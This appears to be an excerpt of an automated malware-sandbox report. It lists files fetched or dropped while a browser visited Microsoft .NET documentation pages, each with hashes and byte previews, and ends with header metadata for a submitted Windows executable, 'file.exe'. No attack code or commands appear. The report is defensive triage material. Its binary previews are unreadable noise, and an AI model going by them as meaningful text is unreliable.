                                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33148
                                                                                                                                                                                                            Entropy (8bit):4.917595394577667
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                            MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                            SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                            SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                            SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):35005
                                                                                                                                                                                                            Entropy (8bit):7.980061050467981
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                                            MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                                            SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                                            SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                                            SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                                            Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):4897
                                                                                                                                                                                                            Entropy (8bit):4.8007377074457604
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                                            MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                                            SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                                            SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                                            SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                                            Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):72
                                                                                                                                                                                                            Entropy (8bit):4.241202481433726
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                                            MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                                            SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                                            SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                                            SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.949283951712022
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                            File size:1'826'816 bytes
                                                                                                                                                                                                            MD5:27fa50c74212925790649267140710f1
                                                                                                                                                                                                            SHA1:0c82522e6f1d877c1b8a49ea16f7cceaee1a78fe
                                                                                                                                                                                                            SHA256:9abbadfacf4127efed4f72ec65c65c741cb4e1f99f71ce53f8ca65666fbb2b6c
                                                                                                                                                                                                            SHA512:f1718e28f649a2db844fc36144702d307830ea7dff889523a61223c7063eb1b53a83b121387f45ed08f3b2cb588ae5c52c7721a4078c9966ff93bcd188a04aa5
                                                                                                                                                                                                            SSDEEP:49152:kF+XXJ0w4jJPR2CEjYLk+9jYgahVLWOOX:k42tsCi+tLexWO
                                                                                                                                                                                                            TLSH:C985337B1E4679CAC2741FB27AB762EF6CB076A981CDC2554F44FA419073705A9B08F0
                                                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................H...........@...........................H.....a.....@.................................\...p..
                                                                                                                                                                                                            Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                            Entrypoint:0x888000
                                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            jmp 00007F5AF4BB45AAh
